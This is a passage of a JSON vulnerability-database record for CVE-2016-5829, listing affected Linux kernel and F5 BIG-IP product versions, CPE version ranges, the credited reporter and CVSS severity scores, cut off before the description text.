        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.37"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "big-ip wom hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "enterprise linux desktop optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip link controller build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "big-ip psm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "big-ip asm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip dns hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "iworkflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "big-ip asm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.110.104.180"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "big-ip gtm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip analytics build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "big-ip apm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip afm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.20"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "big-ip analytics hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "big-ip ltm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "big-ip afm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "big-ip pem hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip afm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip aam hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "big-ip aam hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "3.1.1"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "big-ip pem hf11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip ltm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "big-ip asm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "big-ip ltm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "big-iq security hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "big-ip ltm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "big-ip apm build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "linux enterprise debuginfo sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "big-ip analytics hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "big-ip websafe hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip pem hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "big-iq device hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.4"
      },
      {
        "model": "big-ip gtm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip ltm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "big-ip apm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "91450"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.18.37",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.1.28",
                "versionStartIncluding": "3.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.10.103",
                "versionStartIncluding": "3.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.16",
                "versionStartIncluding": "4.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.6.5",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.37",
                "versionStartIncluding": "3.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.12.62",
                "versionStartIncluding": "3.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.2.82",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.14.74",
                "versionStartIncluding": "3.13",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Scott Bauer",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2016-5829",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-5829",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-5829",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-5829",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201606-598",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-5829",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
